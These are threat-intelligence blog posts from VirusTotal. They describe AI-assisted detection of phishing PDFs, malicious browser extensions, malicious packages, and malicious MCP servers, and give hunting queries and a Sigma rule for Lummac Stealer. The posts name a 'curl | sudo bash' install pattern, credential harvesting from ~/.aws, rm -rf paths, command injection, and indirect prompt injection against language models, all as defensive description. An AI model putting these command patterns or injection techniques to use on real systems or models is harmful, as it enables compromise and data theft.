This PDF is a real-world sample sent to VirusTotal and captured by Code Insights during early testing. It was flagged as malicious based entirely on its visible content, without relying on any embedded code or execution logic. The file was marked as clean by all other engines, likely because it contains no scripts, exploits, or embedded payloads.

d92a1a7460c580f8bf6af3cbd39c7840cfe6a146ee15ede8e23c50c2a85becb9

The document pretends to be a debt collection notice from a German agency acting on behalf of Amazon. It includes a formal layout, legal threats, payment instructions, and multiple references to German addresses and regulations. Visually, it looks legitimate.


However, the AI flagged it as fraudulent based on several critical inconsistencies, the most important one being the destination bank account. The payment is requested to an IBAN starting with BG, indicating a Bulgarian account. This contradicts the sender's claimed German identity and would be highly unusual for a legitimate German debt agency. This mismatch alone was enough for Code Insights to classify the file as fraudulent. Additional content cues (urgent tone, fee breakdown, legal pressure) support the assessment.
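The country mismatch that drove this verdict can also be expressed as a simple rule. The following is a minimal sketch, not how Code Insights works internally: the function names are hypothetical, the check only reads the two-letter country prefix of an IBAN, and it does not validate the checksum.

```python
import re
from typing import Optional


def iban_country(iban: str) -> Optional[str]:
    """Return the two-letter country prefix of an IBAN-shaped string, or None."""
    compact = re.sub(r"\s+", "", iban).upper()
    # Shape check only: country code, two check digits, then the account part.
    match = re.fullmatch(r"([A-Z]{2})\d{2}[A-Z0-9]{1,30}", compact)
    return match.group(1) if match else None


def country_mismatch(claimed_country: str, iban: str) -> bool:
    """True when the IBAN country differs from the country the sender claims."""
    code = iban_country(iban)
    return code is not None and code != claimed_country.upper()
```

For example, `country_mismatch("DE", "BG80 BNBG 9661 1020 3456 78")` returns `True`. The IBAN here is a placeholder value, not the one from the sample.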

As described in the Code Insights analysis:

“The visual and textual content confirms the document is a sophisticated phishing attack. It masquerades as an urgent payment demand from a German debt collection agency, supposedly on behalf of Amazon. The document employs high-pressure tactics, including threats of legal action, additional fees, and credit score damage, to compel the recipient to act quickly. The primary and most conclusive indicator of fraud is the demand for payment to a Bulgarian bank account, which is a stark and highly irregular contradiction to the agency's purported German location and registration.”

This is a case where AI adds value by reasoning over the content semantics, not the file structure.


Case 2 - QR-based phishing (quishing) campaign

This is another real-world PDF captured during early testing of Code Insights. At the time of analysis, no antivirus or malware detection engines flagged the file as malicious. The PDF has no embedded scripts, exploits, or execution logic. From a technical perspective, it looks benign.

259e202847d04866acd76427f53bfd9a15372ed6ed56a9e54ba1c62442c945ee

The visible content, however, impersonates an HR notification about a salary increase. It includes multiple social engineering red flags: awkward grammar, lack of personalization, and an irrelevant privacy disclaimer. The only call to action is a QR code, encouraging the recipient to scan it for more details.


Code Insights analyzed and decoded the QR, extracting the hidden URL. The domain is non-corporate and clearly unrelated to HR or payroll systems. The combination of deceptive HR messaging with a QR code that conceals a phishing URL confirms the document is a credential harvesting fraud delivered via PDF.


Case 3 - Vishing via fake PayPal alert

This is another real-world PDF flagged by Code Insights during early evaluation. No antivirus or malware detection engines classified the file as malicious. Structurally, it’s simple and inert: there are no scripts, automatic actions, or embedded links. Minor stream decoding errors are present but considered low-risk anomalies.

d0bedc70085efff5218b901cdaba95d565df867495181544041ba4b8a6019cea


The threat lies entirely in the content. The document impersonates PayPal and trusted brands like Visa to deliver a fake security alert about a high-value unauthorized purchase. The language is urgent and designed to induce panic.

According to Code Insights:

“[...]the visual content of the document is a clear social engineering lure designed for a voice phishing (vishing) attack. [...] The document's sole purpose is to persuade the user to call a specific phone number under the pretense of canceling the fraudulent order. The malicious nature is confirmed by several red flags, including an awkwardly phrased greeting and a phone number with a geographic area code (808) that is deceptively labeled as "Toll-Free." This tactic aims to route the victim to a scammer for social engineering and potential fraud.”
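The "Toll-Free" red flag is easy to check mechanically. Below is a small sketch under stated assumptions: it only handles North American Numbering Plan numbers, the function names are hypothetical, and the set lists the toll-free prefixes currently in use (800, 833, 844, 855, 866, 877, 888). Area code 808 is not among them.

```python
import re

# NANP toll-free prefixes; any other area code is a geographic or other code.
TOLL_FREE_AREA_CODES = {"800", "833", "844", "855", "866", "877", "888"}


def nanp_area_code(number):
    """Extract the 3-digit area code from a NANP phone number, or None."""
    digits = re.sub(r"\D", "", number)
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]  # drop the country code
    return digits[:3] if len(digits) == 10 else None


def falsely_toll_free(number, label):
    """True when the label claims toll-free but the area code is not."""
    code = nanp_area_code(number)
    text = label.lower()
    claims = "toll-free" in text or "toll free" in text
    return claims and code is not None and code not in TOLL_FREE_AREA_CODES
```

Calling `falsely_toll_free("+1 (808) 555-0100", "Toll-Free")` returns `True`; the phone number is a placeholder, not the one in the document.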


Case 4 - Fake Tax Refund from the Australian Taxation Office

As with previous cases, this PDF wasn’t flagged by any antivirus engine in VirusTotal, but Code Insights identified it as a phishing lure that impersonates the Australian Taxation Office.

b9b763e4b091bc59e9b9f355617622dbabdc1ff2de6707a94ccb26aa7682300e


As described by Code Insights:

“This document is a phishing lure designed to impersonate the Australian Taxation Office (ATO). The visual layer uses an authentic-looking government logo and the promise of a tax refund to entice the recipient into clicking an "Access Document" button. The purpose is to have the user provide an electronic signature for a supposed refund authorization, creating a sense of urgency and financial incentive. The document exhibits multiple red flags common to phishing attacks. These include a generic greeting, a suspicious reference to a .doc file (a common malware vector), instructions that discourage direct replies, and a complete lack of legitimate contact information or alternative methods for verification. The entire premise relies on tricking the user into clicking the button, which likely leads to a malicious website for credential theft or malware download.”


Auto-executing PDF Posing as a Movie Download

Unlike previous examples, this PDF was flagged by 13 antivirus engines in VirusTotal. In this case, the attack is embedded both in the internal structure of the file and its visual appearance. Code Insights correlates these two layers, the technical and the social, to expose the malicious intent.

44e653fe79d1ab160c784c06f4d99def6419e379ef3f802af9f48d595976d2c7


As described by Code Insights:

“The document presents a social engineering lure, masquerading as a download page for pirated movies […] to entice users into clicking links. This theme, centered on illegal content distribution, is a common tactic for malware delivery. Technical analysis of the PDF's internal structure corroborates the malicious intent. The file is configured with an /OpenAction command, a high-risk feature designed to automatically execute an action upon the document being opened […] The combination of a deceptive, high-risk theme with an automatic execution function indicates that the document’s purpose is to compromise the user's system.”
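For readers who want a quick first look at the structural layer before any AI analysis, a rough triage can be sketched by counting risky name tokens in the raw bytes. This is an illustration only and not part of Code Insight: the token list and function name are assumptions, and names hidden inside compressed object streams or written with hex escapes will not be counted.

```python
import re

# Name tokens commonly associated with automatic or active PDF behavior.
RISKY_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS",
               b"/Launch", b"/EmbeddedFile")


def count_risky_names(pdf_bytes: bytes) -> dict:
    """Count occurrences of each risky name token in raw PDF bytes."""
    counts = {}
    for name in RISKY_NAMES:
        # Require a non-name character after the token so /AA does not
        # match inside a longer name such as /AAPL.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode()] = len(re.findall(pattern, pdf_bytes))
    return counts
```

A non-zero `/OpenAction` count is only a hint that the file triggers something on open; many benign PDFs use it to set the initial view, so the result needs to be read together with the visible content.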

We are actively improving Code Insight based on what we learn from these early cases. PDF is the 6th most common file type submitted to VirusTotal, with around 100,000 new samples uploaded every day. That volume requires us to be strategic: for now, only a selected percentage of PDF files submitted via the public web interface are processed by Code Insight, as we test, tune, and scale the system.

These first results are helping us refine both effectiveness and performance. We’ll continue expanding coverage as we improve detection of threats.

Code Insight Expands to Uncover Risks Across the Software Supply Chain

14 August 2025 at 09:59

When we launched Code Insight, we started by analyzing PowerShell scripts. Since then, we have been continuously expanding its capabilities to cover more file types. Today, we announce that Code Insight can now analyze a broader range of formats crucial to the software supply chain. This includes browser extensions (CRX for Chrome, XPI for Firefox, VSIX for VS Code), software packages (Python Wheel, NPM), and protocols like MCP that enable Large Language Models to interact with external tools.



Attackers are increasingly targeting these formats to distribute malware, steal data, or compromise systems. Traditional detection methods, which often rely on signatures or machine learning focused on classification, can struggle to keep up with the dynamic and obfuscated nature of these threats. This is where AI can make a real difference. By analyzing the underlying code logic, Code Insight can identify malicious behavior even in previously unseen threats, providing a deeper level of security analysis.

This is particularly relevant in a landscape where even a single malicious browser extension can lead to significant data breaches, financial loss, or the compromise of corporate networks.


A Viral Tweet and a Real-World Example

In the last few hours, a tweet from a seasoned crypto user (zak.eth) went viral, narrating how his wallet was drained by a malicious extension for the first time in over ten years of activity. This incident is a stark reminder that anyone can be a target.


This is a prime example of where Code Insight can be instrumental. It can analyze one of the suspicious extensions mentioned in the thread and reveal its malicious nature:

From here, we will explore different examples of the new formats supported by Code Insight and specific examples where traditional engines fail to detect a threat.


CRX (Chrome Extensions)

CRX files are the format used for packaging Google Chrome browser extensions. While they can enhance browsing, they also represent an attack vector if they contain malicious code. Here is an example of a seemingly legitimate "Norton Safe Search" extension. However, Code Insight's analysis reveals its true, malicious purpose:

6ca4466baf5ff09bab90a5d06bf113667717400daa59a287393e8f3f10959aba

The extension is obfuscated to hide its true purpose. The code in js/background.js communicates with a command and control (C2) server located at a domain unrelated to Norton. The most critical malicious behavior is its capability to fetch and execute arbitrary code from the C2 server. This allows the attacker to dynamically change the extension's functionality after installation, effectively turning the user's browser into a bot.

In another case, a banking trojan targeting Westpac customers was identified:

34244257f633e104d06b0c4273caca96eb916d26540eeea68495707cbc920bdb

This extension is a banking trojan specifically targeting Westpac customers. It operates as a Man-in-the-Browser (MitB) malware to steal credentials, session data, and funds. It establishes a persistent WebSocket connection to a hardcoded C2 server, collects all cookies from the browser and intercepts form submissions, specifically targeting the input field for the 'AuthorisationCode' (a 2FA/OTP token).


VSIX (Visual Studio Code Extensions)

VSIX files are used for extensions in Visual Studio Code, a popular code editor. Developers can be targeted through these extensions, potentially compromising their development environment and projects.

A deceptive "Zoom" extension for VS Code was found to be stealing user data:

5c89ba9e1bbb7ef869e4553081a40cabbd91a70506d759fd4e97eefb0434c074

The extension attempts to access sensitive user data by reading browser cookies from a known local SQLite database file. It also includes functionality to make external network requests to an unusual domain, which could be used to exfiltrate the collected sensitive data. This combination of local data collection and external communication is an indicator of malicious intent, specifically information theft.


XPI (Firefox Extensions)

XPI files are used for Firefox browser add-ons. Similar to Chrome extensions, they can be used to distribute malware.

A "Mass Tiktok Video Downloader" extension was found to be a phishing and data exfiltration tool:

2c0c8bd05a4942b389feaeb02c372b6443efac9d0931e0bdc602474178b54e7f

It presents a fake Facebook password confirmation popup to phish user credentials. Concurrently, its background script actively collects all browser cookies. All collected data, including the phished passwords, are exfiltrated to a Telegram bot API endpoint.


WHL (Python Wheel)

WHL files are a standard format for distributing Python packages. The threats in these examples are not limited to intentionally malicious code; they also include packages with critical vulnerabilities or insecure coding patterns that can be exploited in supply chain attacks.

An "hh-applicant-tool" designed to interact with an API was found to have a suspicious telemetry feature:

1a168e47cb2d81f54fe504e66e353251a772164959ec71517d2070bf96fee957

It collects data, including vacancy details, employer information, and Google Docs links found in messages, and sends it to a custom server. This communication explicitly disables SSL certificate verification (verify=False), making the data transfer vulnerable to Man-in-the-Middle attacks.
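The verify=False pattern is straightforward to spot statically. As a minimal sketch (the function name is hypothetical, and this is not how Code Insight reaches its verdict), Python's standard ast module can list every call that passes a literal verify=False:

```python
import ast


def find_disabled_tls_verification(source: str) -> list:
    """Return line numbers of calls that pass the keyword verify=False."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for keyword in node.keywords:
            is_false = (isinstance(keyword.value, ast.Constant)
                        and keyword.value.value is False)
            if keyword.arg == "verify" and is_false:
                hits.append(node.lineno)
    return sorted(hits)
```

The check only sees literal values; a call such as `verify=some_flag` would need data-flow analysis and is out of scope for this sketch.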

In another instance, a package named "ncatbot" contained a critical security vulnerability:

f2714f6b87689c4d631a587813d14c4e463be7251bf16ff383ad2b7940ca7a4d

A critical security vulnerability exists in the Linux installation process, which executes a remote script with root privileges using curl | sudo bash. This allows for arbitrary code execution and system compromise if the remote script is malicious or its source is compromised.
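The pipe-to-shell install pattern can be flagged with a simple text search. The sketch below is an assumption-laden illustration: the regular expression and function name are ours, it only covers curl or wget piped directly into a shell, and variants such as `sudo -E bash` or downloads saved to a file and run later are not matched.

```python
import re

# curl or wget output piped straight into sh/bash/zsh/dash, optionally via sudo.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
)


def find_pipe_to_shell(text):
    """Return every download-and-execute snippet found in the text."""
    return [match.group(0) for match in PIPE_TO_SHELL.finditer(text)]
```

Running it over install scripts, README files, and setup code in a package gives a short list of lines worth reviewing by hand.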


NPM (Node Package Manager)

NPM is the default package manager for Node.js and is central to the JavaScript ecosystem. Malicious NPM packages are a constant threat to developers and applications.

A package named "serverless-shop-functions" presented as a benign e-commerce application but contained two malicious Python scripts:

8f7a061901c935493e17f3f897a2b98b5ab21350593fda10a6936a84db5b28b7

Backdoor.Python.PolymorphNecro.h is identified as a polymorphic IRC botnet client. Its capabilities include network sniffing, ARP poisoning, and various DDoS attack methods. Main.py is a Discord-controlled Remote Access Trojan (RAT) with extensive capabilities, including establishing persistence, executing arbitrary PowerShell commands, and capturing and exfiltrating screenshots and webcam photos.


PyPI (Python Package Index)

PyPI is the official third-party software repository for Python. It's a common target for attackers looking to distribute malicious packages. However, the threat also comes from packages that, while not intentionally malicious, contain critical vulnerabilities in their design.

A package named python-mcp-client was found to have severe vulnerabilities allowing for remote code execution:

83c4c8d38e3eea555666e26ed85953b7479d46d9b4d2c12c521ae5f505b343d2

The package exposes severe vulnerabilities that allow for remote code execution (RCE) and arbitrary file system operations. The flask_app.py component allows users to dynamically add new MCP servers via the /api/add_server endpoint. This endpoint directly accepts user-provided command and args parameters, enabling an attacker to execute arbitrary shell commands on the host system.
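One common way to close this kind of hole is to stop accepting a command line from the request at all and resolve a server identifier against a fixed registry instead. The following is a sketch of that idea only; it is not the package's code, and the registry contents, package name, and function name are hypothetical.

```python
# Hypothetical registry: each server ID maps to a fixed, reviewed argv list.
REGISTERED_SERVERS = {
    "filesystem": ["npx", "-y", "example-mcp-filesystem"],
}


def resolve_server(server_id: str) -> list:
    """Return the pre-approved argv for a server ID, or raise ValueError."""
    try:
        # Copy the list so callers cannot mutate the registry entry.
        return list(REGISTERED_SERVERS[server_id])
    except KeyError:
        raise ValueError(f"unknown MCP server: {server_id!r}") from None
```

Because the caller can only choose among known entries, attacker-supplied text never reaches the process launcher. The returned list should still be passed to a process API as an argument list, not joined into a shell string.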

By expanding Code Insight's capabilities, we aim to provide the cybersecurity community with a tool to better understand and mitigate the evolving threats within the software supply chain. Stay tuned as we continue to enhance our platform to counter new attack vectors.

YARA-X 1.0.0: The Stable Release and Its Advantages

4 June 2025 at 21:49

Short note for everyone who already lives and breathes YARA:

Victor (aka plusvic) just launched YARA-X 1.0.0. Full details: https://virustotal.github.io/yara-x/blog/yara-x-is-stable/



What changes for you

Area | YARA 4.x | YARA-X
-----|----------|-------
Engine | C/C++, manual memory | Rust, memory-safe
Rule compatibility | - | ~99 % work as-is
Speed (regex / loops) | Can bottleneck scans | Often 5–10× faster
Error messages | Generic | Line-accurate, clearer
CLI | Plain text | Colour, JSON/YAML dump, shell completion
Future work | Bug-fix only | New features land here


Why move now

  • Performance – heavy rules (large regex, deep loops) finish seconds faster.
  • Safety – Rust core avoids the usual memory bugs and makes crashes rare.
  • Maintainability – parser and scanner are decoupled; easier to embed or extend.
  • Better tooling – built-in formatter (yara-x fmt), linter-friendly output.
  • Active roadmap – new language features will go to YARA-X only.

We already use YARA-X at VirusTotal for Livehunt and Retrohunt. Billions of files later, it behaves.

Give it a spin, report issues, and send feedback our way. Huge thanks to Victor for pushing the project this far. Let’s keep making pattern matching simpler and faster.

What 17,845 GitHub Repos Taught Us About Malicious MCP Servers

4 June 2025 at 10:58

Spoiler: VirusTotal Code Insight’s preliminary audit flagged nearly 8% of MCP (Model Context Protocol) servers on GitHub as potentially forged for evil, though the sad truth is, bad intentions aren’t required to follow bad practices and publish code with critical vulnerabilities.



Before we get started, a quick personal note. A couple of weeks ago, I announced at Google that I’m stepping away from my role as a manager of managers and getting back to my roots, focusing on the VirusTotal community. And I’m not doing it alone. I’m joined by some legendary names from the project’s early days, like Julio, the very first VirusTotal developer and Víctor, creator of YARA and YARA-X. In this new chapter, we’re going deep into AI, not just evolving VT and using it to analyze typical threats but also to hunt down the new ones riding the AI wave, like malicious models and MCPs among others.

As many of you already know, MCP (Model Context Protocol) is a simple but powerful standard that lets large language models interact with external tools and APIs via JSON-RPC. Think of it as a universal adapter: MCP turns scripts, services, and data sources into callable functions that models like Claude, GPT or Gemini can use to answer complex queries or automate tasks. In just a few months, MCP has gone from niche to near-standard with native support across most major LLM platforms.

Before building and releasing our own MCP server for VirusTotal (which is coming very soon) we wanted to take a step back and understand how this protocol is being used in the wild. Specifically: are people already abusing it to build malicious plugins? And if so, how could we detect and classify these threats inside VT?

With that in mind, I set out to run a quick three-phase experiment (aka three humble Python scripts). First, a harvesting phase to collect as many GitHub projects as possible by querying the API for MCP-related keywords like “model-context-protocol”, “server_mcp” or “define_mcp_tool”, among others. Then came a filtering step to isolate the interesting repos. Not everything with "MCP" in the README is a real server implementation, so I built a scoring system to identify true servers based on dependency files, import statements, keywords in code, presence of mcp.json, and more. After applying that filter, we ended up with a focused dataset of 17,845 likely MCP server projects.
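To give a feel for what such a filter can look like, here is a minimal sketch of a signal-based score. It is not the script used in the experiment: the field names, weights, and threshold are all hypothetical and chosen only to illustrate the idea.

```python
from dataclasses import dataclass


@dataclass
class RepoSignals:
    has_mcp_dependency: bool  # MCP SDK listed in a dependency file
    has_mcp_import: bool      # MCP SDK imported somewhere in the code
    keyword_hits: int         # count of MCP-specific keywords in code
    has_mcp_json: bool        # an mcp.json file is present


# Hypothetical cut-off: at least two strong signals, or one plus keywords.
THRESHOLD = 5


def score(signals: RepoSignals) -> int:
    """Sum hypothetical weights for each signal found in a repository."""
    total = 0
    total += 3 if signals.has_mcp_dependency else 0
    total += 3 if signals.has_mcp_import else 0
    total += 2 if signals.has_mcp_json else 0
    total += min(signals.keyword_hits, 4)  # cap so keywords alone stay below the threshold
    return total


def is_likely_server(signals: RepoSignals) -> bool:
    return score(signals) >= THRESHOLD
```

With these weights, a repository that only mentions MCP keywords scores at most 4 and is filtered out, while one that both depends on and imports an MCP SDK passes.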

Finally, as the third phase, we ran a security review using VT Code Insight powered by Gemini 2.5 Flash, taking advantage of its 1-million token context window, speed, and code analysis skills to evaluate each project as a whole. We asked Code Insight for a basic verdict and to flag any High, Medium, or Low vulnerabilities. But after just a few hundred analyses we had to hit pause: Code Insight was surfacing so many issues that the results quickly became overwhelming. So we tightened things up with a second and more focused prompt, asking Code Insight to look specifically for signs of intentional malicious behavior along with reasoning that supported a conclusion of malice.

We let the new prompt run on the full dataset and Code Insight got to work. In the end, it marked 1,408 repositories as likely designed to be malicious. After checking some of these results by hand, two things were clear to me. First: there are many possible attack vectors that can be used through an MCP server. And second: Code Insight seems to trust human developers too much; it often assumes that some bad practices and the resulting critical bugs couldn’t be accidental.

“This pattern—creating a powerful, remotely triggerable code execution vulnerability and simultaneously preparing a collection of sensitive data (including data not needed for normal operation)—is characteristic of an intentional backdoor designed for data exfiltration and system compromise. The dynamic tool generation serves as a plausible cover for the unsafe use of `exec`.” Oh, Code Insight… if only you knew the kind of chaos vibe coding is causing. We’re going to be very busy in cybersecurity cleaning up after these accidental masterpieces

We’ve confirmed some of the flagged projects were just proof-of-concepts and security researcher demos, and many tiny “hello-world” examples were missing basic security features which Code Insight called out as “likely malicious”, because no sane developer would ship that to production. But even if you filter out the hobby projects, there’s still a scary amount of real attack vectors and critical vulnerabilities out there.

While we continue manually reviewing Code Insight’s reports to learn more about the issues and weak spots it uncovered, we also asked Gemini 2.5 Flash to help us categorize them. We provided it with the problem summaries from the 1,408 MCP-related repositories flagged as potentially problematic, and asked for a simple list, just a brief enumeration of the attack techniques involved. Gemini came back with the following list:

Attack vector | Example Indicators
--------------|-------------------
Malicious-Server Supply Chain | Self-update scripts, install hooks from non-canonical URLs, latest tag pulls.
Rogue Server / Impersonation | Hard-coded IPs or typo-squatted domains, no TLS/mTLS verification.
Credential Harvesting | Code that reads ~/.aws, Keychain, or env vars and posts to external endpoint.
Tool-Based RCE & File Ops | subprocess, exec, or rm -rf paths built from LLM/user input.
Server-Side Command Injection | Server concatenates JSON-RPC params into shell/SQL without escaping.
Semantic-Gap Poisoning | Manifest says “read-only”; implementation writes files or opens sockets.
Over-broad Permissions | OAuth scopes * / “full_access”, multiple data silos bridged in one tool.
Indirect Prompt Injection | HTML comments, zero-width chars, or Base64 blobs returned to the host.
Context/Data Poisoning | Unvalidated web-scrape fed straight into context= parameter.
Sampling-Feature Abuse | Server requests giant completions before any other call; leaks system prompt.
Living-Off-The-Land | Malicious server does nothing but orchestrate trusted tools already installed.
Chained MCP Exploitation | Output from Server A becomes params for Server B within one loop.
Financial-Fraud Tools / DoS / Persistence | Payment APIs with LLM-supplied dest-IDs, infinite loops without rate limits, hot-swapped binaries.

If you're building or defending around MCPs, there are a few quick wins to keep things safer:

  • treat MCP servers like browser extensions (sign, hash, and pin specific versions)
  • isolate them in containers or WASM sandboxes with strict file and network limits
  • make permissions visible and revocable through a clear, zero-trust-style UI
  • and never let model outputs go unfiltered: strip out sneaky stuff like invisible characters, HTML comments, or rogue script tags before looping anything back into your LLM.
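The last point can be sketched in a few lines. This is a minimal illustration with a hypothetical function name, and it is nowhere near a complete defense against prompt injection: it removes a handful of zero-width characters, HTML comments, and script elements before text is fed back to a model.

```python
import re

# Zero-width and BOM characters often used to hide instructions in text.
INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff"))
HTML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)
SCRIPT_TAG = re.compile(r"<script\b.*?</script\s*>", re.DOTALL | re.IGNORECASE)


def sanitize_tool_output(text: str) -> str:
    """Remove invisible characters, HTML comments, and script elements."""
    # Drop invisible characters first so they cannot split a comment or
    # tag marker and hide it from the patterns below.
    text = text.translate(INVISIBLE)
    text = HTML_COMMENT.sub("", text)
    return SCRIPT_TAG.sub("", text)
```

In practice this would sit between the MCP client and the model, applied to every tool result, alongside the isolation and permission controls listed above.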

MCPs are growing fast (almost 18,000 servers already in the wild), and with that growth comes a mountain of security debt. The good news? We’ll soon be launching a dedicated feature in VirusTotal to analyze MCP servers.
Stay tuned… we’re just getting started.

Research that builds detections

9 January 2025 at 09:51
Note: You can view the full content of the blog here.

Introduction

Detection engineering is becoming increasingly important in surfacing new malicious activity. Threat actors might take advantage of previously unknown malware families - but a successful detection of certain methodologies or artifacts can help expose the entire infection chain.
In previous blog posts, we announced the integration of Sigma rules for macOS and Linux into VirusTotal, as well as ways in which Sigma rules can be converted to YARA to take advantage of VirusTotal Livehunt capabilities. In this post, we will show different approaches to hunt for interesting samples and derive new Sigma detection opportunities based on their behavior.

Tell me what role you have and I'll tell you how you use VirusTotal

VirusTotal is a really useful tool that can be used in many different ways. We have seen how people from SOCs and Incident Response teams use it (in fact, we have our VirusTotal Academy videos for SOC and IR teams), and we have also shown how those who hunt for threats or analyze those threats can use it too.
But there's another really cool way to use VirusTotal - for people who build detections and those who are doing research. We want to show everyone how we use VirusTotal in our work. Hopefully, this will be helpful and also give people ideas for new ways to use it themselves.
To explain our process, we used examples of Lummac and VenomRAT samples that we found in recent campaigns. These caught our attention due to some behaviors that had not been identified by public detection rules in the community. For that reason, we have created two Sigma rules to share with the community, but if you want to get all the details about how we identified them and started our research, go to our Google Threat Intelligence community blog.

Our approach

As detection engineers, it is important to look for techniques that can be in use by multiple threat actors - as this makes tracking malicious activity more efficient. Prior to creating those detections, it is best to check existing research and rule collections, such as the Sigma rules repository. This can save time and effort, as well as provide insight into previously observed samples that can be further researched.
A different approach would be to instead look for malicious files that are not detected by existing Sigma rules, since they can uncover novel methodologies and provide new opportunities for detection creation.
One approach is to hunt for files that are flagged by at least five different AV vendors, were uploaded within the last month, have sandbox execution (in order to view their behavior), and have not triggered any Crowdsourced Sigma rules.
p:5+ have:behavior fs:30d+ not have:sigma
This initial query can be adapted to incorporate additional filters that the researcher may find relevant. These could include modifiers to identify, for example, the presence of the PowerShell process in the list of executed processes (behavior_created_processes:powershell.exe), filtering results to only include documents (type:document), or identifying communication with services like Pastebin (behavior_network:pastebin.com).
Another way to go is to look at files that have been flagged by at least five AV engines and were run in either Zenbox or CAPE. These sandboxes often have great logs produced by Sysmon, which are really useful for figuring out how to spot these threats. Again, we'd want to focus on files uploaded in the last month that haven't triggered any Sigma rules. This gives us a good starting point for building new detection rules.
p:5+ (sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox") fs:30d+ not have:sigma
Lastly, another idea is to look for files that have not triggered many high severity detections from the Sigma Crowdsourced rules, as these can be more evasive. Specifically, we will look for samples with zero critical, high or medium alerts - and no more than two low severity ones.
p:5+ have:behavior fs:30d+ sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-
With these queries, we can start investigating samples that may be good candidates for new detection rules.
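The three queries above share most of their parts, so they can be generated from a few parameters. The sketch below uses hypothetical helper names and only builds the query string and the request URL; sending it to the VirusTotal API v3 intelligence search endpoint requires an API key with the right privileges, passed in the x-apikey header.

```python
from urllib.parse import urlencode

SEARCH_ENDPOINT = "https://www.virustotal.com/api/v3/intelligence/search"


def build_hunt_query(min_detections=5, window_days=30, sandboxes=(), extra=()):
    """Assemble a search query from the building blocks used in this post."""
    parts = [f"p:{min_detections}+"]
    if sandboxes:
        names = " or ".join(f'sandbox_name:"{name}"' for name in sandboxes)
        parts.append(f"({names})")
    else:
        parts.append("have:behavior")
    parts.append(f"fs:{window_days}d+")
    # Default to samples that triggered no Crowdsourced Sigma rule.
    parts.extend(extra or ["not have:sigma"])
    return " ".join(parts)


def search_url(query, limit=10):
    """Return the URL-encoded search URL for a query (no request is sent)."""
    return f"{SEARCH_ENDPOINT}?{urlencode({'query': query, 'limit': limit})}"
```

Calling `build_hunt_query()` with no arguments reproduces the first query, and passing `sandboxes=("CAPE Sandbox", "Zenbox")` reproduces the second.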

Our detections for the community

Our approach helps us identify behaviors that seem interesting and worth focusing on. In our blog, where we explain this approach in detail, we highlighted two campaigns linked to Lummac and VenomRAT that exhibited interesting activity. Because of this, we decided to share the Sigma rules we developed for these campaigns. Both rules have been published in Sigma's official repository for the community.

Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

title: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed in a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
references:
    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-11-14
tags:
    - attack.defense-evasion
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
    selection_parent:
        ParentImage|endswith: '\more.com'
    selection_child:
        - Image|endswith: '\vbc.exe'
        - OriginalFileName: 'vbc.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

Sysmon event for: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 1,
    "Version": 5,
    "Level": 4,
    "Task": 1,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-11-26T16:23:05.132539500Z"
    },
    "EventRecordID": 692861,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2396,
      "ThreadID": 3116
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-11-26 16:23:05.064",
    "ProcessGuid": "{C784477D-F5E9-6745-6006-000000003F00}",
    "ProcessId": 4184,
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "FileVersion": "14.8.3761.0",
    "Description": "Visual Basic Command Line Compiler",
    "Product": "Microsoft® .NET Framework",
    "Company": "Microsoft Corporation",
    "OriginalFileName": "vbc.exe",
    "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "CurrentDirectory": "C:\\Users\\george\\AppData\\Roaming\\comlocal\\RUYCLAXYVMFJ\\",
    "User": "DESKTOP-B0T93D6\\george",
    "LogonGuid": "{C784477D-9D9B-66FF-6E87-050000000000}",
    "LogonId": "0x5876e",
    "TerminalSessionId": 1,
    "IntegrityLevel": "High",
    "Hashes": {
      "SHA1": "61F4D9A9EE38DBC72E840B3624520CF31A3A8653",
      "MD5": "FCCB961AE76D9E600A558D2D0225ED43",
      "SHA256": "466876F453563A272ADB5D568670ECA98D805E7ECAA5A2E18C92B6D3C947DF93",
      "IMPHASH": "1460E2E6D7F8ECA4240B7C78FA619D15"
    },
    "ParentProcessGuid": "{C784477D-F5D4-6745-5E06-000000003F00}",
    "ParentProcessId": 6572,
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
    "ParentCommandLine": "C:\\Windows\\SysWOW64\\more.com",
    "ParentUser": "DESKTOP-B0T93D6\\george"
  }
} 
